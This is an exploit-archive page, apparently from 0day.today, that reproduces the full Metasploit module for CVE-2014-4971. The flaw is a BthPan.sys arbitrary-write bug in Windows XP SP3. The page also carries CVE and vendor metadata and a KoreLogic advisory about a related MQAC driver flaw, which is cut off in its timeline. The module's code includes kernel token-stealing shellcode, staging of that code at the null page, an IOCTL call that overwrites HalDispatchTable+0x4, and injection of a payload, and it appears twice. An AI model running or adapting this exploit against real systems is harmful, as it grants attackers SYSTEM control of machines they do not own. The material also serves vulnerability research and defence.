Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
2014-10-16T00:00:00
ID 1337DAY-ID-22760 Type zdt Reporter metasploit Modified 2014-10-16T00:00:00
Description
A vulnerability in the Microsoft Bluetooth Personal Area Networking driver, BthPan.sys, allows an attacker to write attacker-controlled memory to an arbitrary location. This can be used to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
  # Local privilege-escalation module for the BthPan.sys arbitrary-write flaw
  # (CVE-2014-4971 per 'References'). Per the Description it stages ring-0
  # shellcode in the current process, overwrites HalDispatchTable+0x4 through
  # the driver's IOCTL handler, then calls NtQueryIntervalProfile so the kernel
  # dispatches into that shellcode. A single Windows XP SP3 x86 target is
  # defined and the check/exploit paths refuse x64 and WOW64 sessions.
  Rank = AverageRanking

  # Mixins supplying the helpers called below (find_haldispatchtable,
  # find_sys_base, open_device, is_system?, execute_shellcode, sysinfo);
  # which mixin provides which is not visible in this file.
  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  # Module metadata. Of the per-target values only 'HaliQuerySystemInfo' is
  # read in this file (by disclose_addresses); the _KPROCESS/_TOKEN/_UPID/
  # _APLINKS entries are never looked up because ring0_shellcode hard-codes
  # those bytes, so they are informational only.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
      'Description' => %q{
A vulnerability within Microsoft Bluetooth Personal Area Networking module,
BthPan.sys, can allow an attacker to inject memory controlled by the attacker
into an arbitrary location. This can be used by an attacker to overwrite
HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
NtQueryIntervalProfile.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
        ],
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'SessionTypes' => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Targets' =>
        [
          ['Windows XP SP3',
            {
              # offset of HaliQuerySystemInfo from the hal.dll base; added to
              # the disclosed base in disclose_addresses
              'HaliQuerySystemInfo' => 0x16bba,
              '_KPROCESS' => "\x44",
              '_TOKEN' => "\xc8",
              '_UPID' => "\x84",
              '_APLINKS' => "\x88"
            }
          ]
        ],
      'References' =>
        [
          [ 'CVE', '2014-4971' ],
          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],
          [ 'OSVDB', '109387' ]
        ],
      'DisclosureDate' => 'Jul 18 2014',
      'DefaultTarget' => 0
    ))
  end

  # Builds the raw x86 machine code the kernel runs once it calls through the
  # corrupted HalDispatchTable+0x4 slot (see the Description). The only
  # non-constant part is the current meterpreter PID, spliced in as a
  # little-endian DWORD. The instruction-level behaviour of the stub is not
  # documented in this file; the 0x44/0xC8/0x84/0x88 bytes embedded below
  # match the _KPROCESS/_TOKEN/_UPID/_APLINKS values in the target table but
  # are hard-coded here rather than read from `target`, so adding another
  # target entry would not change this stub.
  #
  # @return [String] the shellcode bytes (the last `<<` is the implicit return)
  def ring0_shellcode
    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
    tokenswap << "\x00\x00\x00\x8B\x80\x88"
    tokenswap << "\x00\x00\x00\x2D\x88"
    tokenswap << "\x00\x00\x00\x39\x98\x84"
    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
    # current PID of the meterpreter process, packed as a little-endian DWORD
    tokenswap << [session.sys.process.getpid].pack('V')
    tokenswap << "\x8B\x80\x88\x00\x00\x00"
    tokenswap << "\x2D\x88\x00\x00\x00"
    tokenswap << "\x39\x98\x84\x00\x00\x00"
    tokenswap << "\x75\xED\x89\xB8\xC8"
    tokenswap << "\x00\x00\x00\x61\xC3"
  end

  # Maps a region of the current process at a caller-chosen address and copies
  # `content` into it.
  #
  # @param proc    [Object] process object from session.sys.process.open; only
  #   proc.memory.writable? and proc.memory.write are used
  # @param address [Integer] desired base address; packed as a 32-bit
  #   little-endian value, so this is x86-only
  # @param length  [Integer] number of bytes to reserve and commit
  # @param content [String] bytes written at `address`
  # @return [Integer, nil] `address` on success; nil if the region is still not
  #   writable or the write fails (failures are only vprint_error'ed, not raised)
  def fill_memory(proc, address, length, content)
    # -1 is the current-process pseudo handle. The NTSTATUS returned by
    # NtAllocateVirtualMemory is discarded; the writable? probe below is the
    # only success check.
    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end
    # NOTE: prints the address in decimal, whereas the later messages use hex
    vprint_good("#{address} is now writable")
    result = proc.memory.write(address, content)
    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    end
    vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
    return address
  end

  # Resolves the kernel addresses used by the exploit.
  #
  # @param t [Hash] target table entry; only t['HaliQuerySystemInfo'] is read
  # @return [Hash, nil] {'halDispatchTable' => Integer,
  #   'HaliQuerySystemInfo' => Integer}, or nil when either HalDispatchTable
  #   or the hal.dll base cannot be located
  def disclose_addresses(t)
    addresses = {}
    hal_dispatch_table = find_haldispatchtable
    return nil if hal_dispatch_table.nil?
    addresses['halDispatchTable'] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")
    vprint_status('Getting the hal.dll base address...')
    # presumably returns [base, name] like the other kernel modules; only
    # element 0 is used here
    hal_info = find_sys_base('hal.dll')
    if hal_info.nil?
      vprint_error('Failed to disclose hal.dll base address')
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")
    # 'HaliQuerySystemInfo' is computed but nothing in this file reads it
    # (exploit only consumes 'halDispatchTable'); in particular no code here
    # writes it back to restore the overwritten table slot afterwards.
    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses['HaliQuerySystemInfo'] = hali_query_system_information
    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
    addresses
  end

  # Fingerprints the session: Safe for WOW64/x64 sessions and for any OS
  # string that is not Windows XP SP3; otherwise Vulnerable iff the
  # \\.\bthpan device can be opened. Opening the device only proves the
  # driver is present, not that the flaw is unpatched. Note the /x64/ match
  # is case-sensitive while /wow64/i is not.
  #
  # @return [Exploit::CheckCode] Safe or Vulnerable
  def check
    if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end
    os = sysinfo["OS"]
    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i
    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle
    session.railgun.kernel32.CloseHandle(handle)
    return Exploit::CheckCode::Vulnerable
  end

  # Exploit flow: gate on check, open the device, resolve HalDispatchTable,
  # stage the ring-0 stub in a low-address buffer, corrupt HalDispatchTable+0x4
  # through the driver IOCTL, call NtQueryIntervalProfile to run the stub, and
  # finally inject the user-mode payload once the session reports SYSTEM.
  # Every failure path goes through fail_with, which raises, so later lines
  # are not reached.
  #
  # @raise via fail_with on any failed step
  def exploit
    if is_system?
      # NOTE: fully-qualified Exploit::Failure here, bare Failure:: below
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end
    # check opens and closes the device itself, so the open below is a second open
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end
    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
    end
    # first table entry rather than the user-selected `target` (only one exists)
    my_target = targets[0]
    print_status("Disclosing the HalDispatchTable address...")
    @addresses = disclose_addresses(my_target)
    if @addresses.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Failed to disclose necessary address for exploitation. Aborting.")
    else
      print_good("Address successfully disclosed.")
    end
    print_status("Storing the shellcode in memory...")
    # NOTE(review): this process object is never closed on any path below
    this_proc = session.sys.process.open
    kernel_shell = ring0_shellcode
    # Base of the staging buffer: the lowest page of the address space. A
    # user-mode mapping of the null page is a well-known indicator of this
    # technique, and newer Windows releases refuse such allocations.
    kernel_shell_address = 0x1
    buf = "\x90" * 0x6000
    # 4-byte DWORD 0x50 followed by 0x400 NOPs (1028 bytes total); what the
    # driver makes of the leading 0x50 is not documented in this file
    buf[0, 1028] = "\x50\x00\x00\x00" + "\x90" * 0x400
    # the ring-0 stub sits at offset 0x5000 inside the 0x6000-byte buffer
    buf[0x5000, kernel_shell.length] = kernel_shell
    result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
    end
    print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
    # Argument order is NtDeviceIoControlFile(FileHandle, Event, ApcRoutine,
    # ApcContext, IoStatusBlock, IoControlCode, InputBuffer, InputBufferLength,
    # OutputBuffer, OutputBufferLength): IOCTL 0x0012d814 with the staged
    # buffer at 0x1 (0x258 bytes) as input and HalDispatchTable+0x4 as the
    # output address — the unvalidated write the Description refers to.
    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
    session.railgun.kernel32.CloseHandle(handle)
    # (message typo: "throw" should read "through")
    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
    # Per the Description this call dispatches through HalDispatchTable+0x4,
    # i.e. into the stub written above. The slot is not restored afterwards,
    # so the corrupted pointer persists after the module finishes.
    session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
    print_status("Checking privileges after exploitation...")
    unless is_system?
      fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
    end
    print_good("Privilege escalation successful!")
    # user-mode payload, injected into the (now elevated) current process
    p = payload.encoded
    print_status("Injecting #{p.length} bytes to memory and executing it...")
    unless execute_shellcode(p)
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end
# 0day.today [2018-04-14] #
{"published": "2014-10-16T00:00:00", "id": "1337DAY-ID-22760", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "A vulnerability within Microsoft Bluetooth Personal Area Networking module, BthPan.sys, can allow an attacker to inject memory controlled by the attacker into an arbitrary location. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.", "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2018-04-14T03:46:17", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-4971"]}, {"type": "exploitdb", "idList": ["EDB-ID:34131", "EDB-ID:34112", "EDB-ID:34982", "EDB-ID:34167"]}, {"type": "korelogic", "idList": ["KL-001-2014-003", "KL-001-2014-002"]}, {"type": "zdt", "idList": ["1337DAY-ID-22462", "1337DAY-ID-22459", "1337DAY-ID-22477"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2A8B8964BB26CD0903DEAAD854198D2F", "EXPLOITPACK:6C1249C6408DDF548B106905FC847650"]}, {"type": "nessus", "idList": ["SMB_NT_MS14-062.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/BTHPAN", "MSF:EXPLOIT/WINDOWS/LOCAL/MQAC_WRITE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127536", "PACKETSTORM:127618", "PACKETSTORM:127535", "PACKETSTORM:128674"]}, {"type": "canvas", "idList": ["MQAC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804492"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14016", "SECURITYVULNS:DOC:30943", "SECURITYVULNS:DOC:30942", "SECURITYVULNS:VULN:13881"]}, {"type": "seebug", "idList": ["SSV:87151", "SSV:87150"]}, {"type": "kaspersky", "idList": ["KLA10601"]}], "modified": "2018-04-14T03:46:17", "rev": 2}, "vulnersScore": 8.4}, "type": "zdt", "lastseen": "2018-04-14T03:46:17", "edition": 2, "title": "Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation", "href": 
"https://0day.today/exploit/description/22760", "modified": "2014-10-16T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": ["CVE-2014-4971"], "sourceHref": "https://0day.today/exploit/22760", "references": [], "reporter": "metasploit", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/exploit/local/windows_kernel'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = AverageRanking\r\n\r\n include Msf::Exploit::Local::WindowsKernel\r\n include Msf::Post::File\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',\r\n 'Description' => %q{\r\n A vulnerability within Microsoft Bluetooth Personal Area Networking module,\r\n BthPan.sys, can allow an attacker to inject memory controlled by the attacker\r\n into an arbitrary location. 
This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\r\n NtQueryIntervalProfile.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC\r\n 'Jay Smith <jsmith[at]korelogic.com>' # MSF module\r\n ],\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Targets' =>\r\n [\r\n ['Windows XP SP3',\r\n {\r\n 'HaliQuerySystemInfo' => 0x16bba,\r\n '_KPROCESS' => \"\\x44\",\r\n '_TOKEN' => \"\\xc8\",\r\n '_UPID' => \"\\x84\",\r\n '_APLINKS' => \"\\x88\"\r\n }\r\n ]\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-4971' ],\r\n [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],\r\n [ 'OSVDB', '109387' ]\r\n ],\r\n 'DisclosureDate' => 'Jul 18 2014',\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n\r\n def ring0_shellcode\r\n tokenswap = \"\\x60\\x64\\xA1\\x24\\x01\\x00\\x00\"\r\n tokenswap << \"\\x8B\\x40\\x44\\x50\\xBB\\x04\"\r\n tokenswap << \"\\x00\\x00\\x00\\x8B\\x80\\x88\"\r\n tokenswap << \"\\x00\\x00\\x00\\x2D\\x88\"\r\n tokenswap << \"\\x00\\x00\\x00\\x39\\x98\\x84\"\r\n tokenswap << \"\\x00\\x00\\x00\\x75\\xED\\x8B\\xB8\\xC8\"\r\n tokenswap << \"\\x00\\x00\\x00\\x83\\xE7\\xF8\\x58\\xBB\"\r\n tokenswap << [session.sys.process.getpid].pack('V')\r\n tokenswap << \"\\x8B\\x80\\x88\\x00\\x00\\x00\"\r\n tokenswap << \"\\x2D\\x88\\x00\\x00\\x00\"\r\n tokenswap << \"\\x39\\x98\\x84\\x00\\x00\\x00\"\r\n tokenswap << \"\\x75\\xED\\x89\\xB8\\xC8\"\r\n tokenswap << \"\\x00\\x00\\x00\\x61\\xC3\"\r\n end\r\n\r\n def fill_memory(proc, address, length, content)\r\n session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), \"MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN\", \"PAGE_EXECUTE_READWRITE\")\r\n\r\n unless proc.memory.writable?(address)\r\n vprint_error(\"Failed 
to allocate memory\")\r\n return nil\r\n end\r\n vprint_good(\"#{address} is now writable\")\r\n\r\n result = proc.memory.write(address, content)\r\n\r\n if result.nil?\r\n vprint_error(\"Failed to write contents to memory\")\r\n return nil\r\n end\r\n vprint_good(\"Contents successfully written to 0x#{address.to_s(16)}\")\r\n\r\n return address\r\n end\r\n\r\n def disclose_addresses(t)\r\n addresses = {}\r\n\r\n hal_dispatch_table = find_haldispatchtable\r\n return nil if hal_dispatch_table.nil?\r\n addresses['halDispatchTable'] = hal_dispatch_table\r\n vprint_good(\"HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}\")\r\n\r\n vprint_status('Getting the hal.dll base address...')\r\n hal_info = find_sys_base('hal.dll')\r\n if hal_info.nil?\r\n vprint_error('Failed to disclose hal.dll base address')\r\n return nil\r\n end\r\n hal_base = hal_info[0]\r\n vprint_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16)}\")\r\n\r\n hali_query_system_information = hal_base + t['HaliQuerySystemInfo']\r\n addresses['HaliQuerySystemInfo'] = hali_query_system_information\r\n\r\n vprint_good(\"HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}\")\r\n addresses\r\n end\r\n\r\n def check\r\n if sysinfo[\"Architecture\"] =~ /wow64/i || sysinfo[\"Architecture\"] =~ /x64/\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n os = sysinfo[\"OS\"]\r\n return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i\r\n\r\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\r\n return Exploit::CheckCode::Safe unless handle\r\n\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Exploit::Failure::None, 'Session is already elevated')\r\n end\r\n\r\n unless check == Exploit::CheckCode::Vulnerable\r\n fail_with(Exploit::Failure::NotVulnerable, \"Exploit not available 
on this system\")\r\n end\r\n\r\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\r\n if handle.nil?\r\n fail_with(Failure::NoTarget, \"Unable to open \\\\\\\\.\\\\bthpan device\")\r\n end\r\n\r\n my_target = targets[0]\r\n print_status(\"Disclosing the HalDispatchTable address...\")\r\n @addresses = disclose_addresses(my_target)\r\n if @addresses.nil?\r\n session.railgun.kernel32.CloseHandle(handle)\r\n fail_with(Failure::Unknown, \"Failed to disclose necessary address for exploitation. Aborting.\")\r\n else\r\n print_good(\"Address successfully disclosed.\")\r\n end\r\n\r\n print_status(\"Storing the shellcode in memory...\")\r\n this_proc = session.sys.process.open\r\n kernel_shell = ring0_shellcode\r\n kernel_shell_address = 0x1\r\n\r\n buf = \"\\x90\" * 0x6000\r\n buf[0, 1028] = \"\\x50\\x00\\x00\\x00\" + \"\\x90\" * 0x400\r\n buf[0x5000, kernel_shell.length] = kernel_shell\r\n\r\n result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)\r\n if result.nil?\r\n session.railgun.kernel32.CloseHandle(handle)\r\n fail_with(Failure::Unknown, \"Error while storing the kernel stager shellcode on memory\")\r\n end\r\n print_good(\"Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}\")\r\n\r\n print_status(\"Triggering the vulnerability, corrupting the HalDispatchTable...\")\r\n session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses[\"halDispatchTable\"] + 0x4, 0)\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n print_status(\"Executing the Kernel Stager throw NtQueryIntervalProfile()...\")\r\n session.railgun.ntdll.NtQueryIntervalProfile(2, 4)\r\n\r\n print_status(\"Checking privileges after exploitation...\")\r\n\r\n unless is_system?\r\n fail_with(Failure::Unknown, \"The privilege escalation wasn't successful\")\r\n end\r\n print_good(\"Privilege escalation successful!\")\r\n\r\n p = payload.encoded\r\n 
print_status(\"Injecting #{p.length} bytes to memory and executing it...\")\r\n unless execute_shellcode(p)\r\n fail_with(Failure::Unknown, \"Error while executing the payload\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-04-14] #", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:14:31", "description": "Microsoft Windows XP SP3 does not validate addresses in certain IRP handler routines, which allows local users to write data to arbitrary memory locations, and consequently gain privileges, via a crafted address in an IOCTL call, related to (1) the MQAC.sys driver in the MQ Access Control subsystem and (2) the BthPan.sys driver in the Bluetooth Personal Area Networking subsystem.\nCWE-123: Write-what-where Condition\n\n<a href=\"http://cwe.mitre.org/data/definitions/123.html\">CWE-123: Write-what-where Condition</a>", "edition": 4, "cvss3": {}, "published": "2014-07-26T15:55:00", "title": "CVE-2014-4971", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4971"], "modified": "2018-10-12T22:07:00", "cpe": ["cpe:/o:microsoft:windows_xp:*"], "id": "CVE-2014-4971", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4971", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*"]}], "canvas": [{"lastseen": "2019-05-29T19:48:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "edition": 2, "description": "**Name**| mqac \n---|--- \n**CVE**| CVE-2014-4971 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| mqac \n**Notes**| References: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt \nCVE Name: CVE-2014-4971 \nVENDOR: Microsoft \nNotes: \nTested 
on: \nWindows XP Professional SP3 English \n \nConstraints: \nIn order to work the Message Queuing component must be installed \n \nUsage: \nWin32/MOSDEF$ runmodule mqac \n \nDate public: 11/28/2013 \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4971 \nCVSS: 7.2 \n\n", "modified": "2014-07-26T15:55:00", "published": "2014-07-26T15:55:00", "id": "MQAC", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/mqac", "type": "canvas", "title": "Immunity Canvas: MQAC", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:13", "description": "", "published": "2014-07-21T00:00:00", "type": "packetstorm", "title": "Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-21T00:00:00", "id": "PACKETSTORM:127536", "href": "https://packetstormsecurity.com/files/127536/Microsoft-XP-SP3-MQAC.sys-Arbitrary-Write-Privilege-Escalation.html", "sourceData": "`Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation \nAdvisory ID: KL-001-2014-003 \nPublication Date: 2014.07.18 \nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt \n \n \n1. Vulnerability Details \n \nAffected Vendor: Microsoft \nAffected Product: MQ Access Control \nAffected Versions: 5.1.0.1110 \nPlatform: Microsoft Windows XP SP3 \nCWE Classification: CWE-123: Write-what-where Condition \nImpact: Privilege Escalation \nAttack vector: IOCTL \nCVE ID: CVE-2014-4971 \n \n2. Vulnerability Description \n \nA vulnerability within the MQAC module allows an attacker to \ninject memory they control into an arbitrary location they \ndefine. This can be used by an attacker to overwrite \nHalDispatchTable+0x4 and execute arbitrary code by subsequently \ncalling NtQueryIntervalProfile. \n \n3. 
Technical Description \n \nA userland process can create a handle into the MQAC device and \nsubsequently make DeviceIoControlFile() calls into that device. \nDuring the IRP handler routine for 0x1965020f the user provided \nOutputBuffer address is not validated. This allows an attacker \nto specify an arbitrary address and write (or overwrite) the \nmemory residing at the specified address. This is classically \nknown as a write-what-where vulnerability and has well known \nexploitation methods associated with it. \n \nA stack trace from our fuzzing can be seen below. In our \nfuzzing testcase, the specified OutputBuffer in the \nDeviceIoControlFile() call is 0xffff0000. \n \nSTACK_TEXT: \nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b \nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 \nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc \nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d \nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d \nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31 \nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70 \nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7 \nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a \n \nReviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' \ncommand shows the fault originating in the mqac driver. \n \nOLLOWUP_IP: \nmqac!AC2QM+5d \nb230af37 891e mov dword ptr [esi],ebx \n \nReviewing the TRAP_FRAME at the time of crash we can see \nIopCompleteRequest() copying data from InputBuffer into the \nOutputBuffer. InputBuffer is another parameter provided to the \nDeviceIoControlFile() function and is therefore controllable by \nthe attacker. The edi register contains the invalid address \nprovided during the fuzz testcase. 
\n \nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4) \nErrCode = 00000002 \neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000 \neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc \ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 \nmqac!AC2QM+0x5d: \nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=???????? \n \nA write-what-where vulnerability can be leveraged to obtain \nescalated privileges. To do so, an attacker will need to \nallocate memory in userland that is populated with shellcode \ndesigned to find the Token for PID 4 (System) and then overwrite \nthe token for its own process. By leveraging the vulnerability \nin MQAC it is then possible to overwrite the pointer at \nHalDispatchTable+0x4 with a pointer to our shellcode. Calling \nNtQueryIntervalProfile() will subsequently call \nHalDispatchTable+0x4, execute our shellcode, and elevate the \nprivilege of the exploit process. \n \n4. Mitigation and Remediation Recommendation \n \nNone. A patch is not likely to be forthcoming from the vendor. \n \n5. Credit \n \nThis vulnerability was discovered by Matt Bergin of KoreLogic \nSecurity, Inc. \n \n6. Disclosure Timeline \n \n2014.04.28 - Initial contact; sent Microsoft report and PoC. \n2014.04.28 - Microsoft acknowledges receipt of vulnerability \nreport; states XP is no longer supported and asks if \nthe vulnerability affects other versions of Windows. \n2014.04.29 - KoreLogic asks Microsoft for clarification of their \nsupport policy for XP. \n2014.04.29 - Microsoft says XP-only vulnerabilities will not be \naddressed with patches. \n2014.04.29 - KoreLogic asks if Microsoft intends to address the \nvulnerability report. \n2014.04.29 - Microsoft opens case to investigate the impact of the \nvulnerability on non-XP systems. \n2014.05.06 - Microsoft asks again if this vulnerability affects \nnon-XP systems. 
\n2014.05.14 - KoreLogic informs Microsoft that the vulnerability \nreport is for XP and other Windows versions have \nnot been examined. \n2014.06.11 - KoreLogic informs Microsoft that 30 business days \nhave passed since vendor acknowledgement of the \ninitial report. KoreLogic requests CVE number for the \nvulnerability, if there is one. KoreLogic also \nrequests vendor's public identifier for the \nvulnerability along with the expected disclosure date. \n2014.06.11 - Microsoft responds to KoreLogic that the \nvulnerability does not affect an \"up-platform\" \nproduct. Says they are investigating embedded \nplatforms. Does not provide a CVE number or a \ndisclosure date. \n2014.06.30 - KoreLogic asks Microsoft for confirmation of their \nreceipt of the updated PoC. Also requests that \na CVE ID be issued to this vulnerability. \n2014.07.02 - 45 business days have elapsed since Microsoft \nacknowledged receipt of the vulnerability report and \nPoC. \n2014.07.07 - KoreLogic requests CVE from MITRE. \n2014.07.18 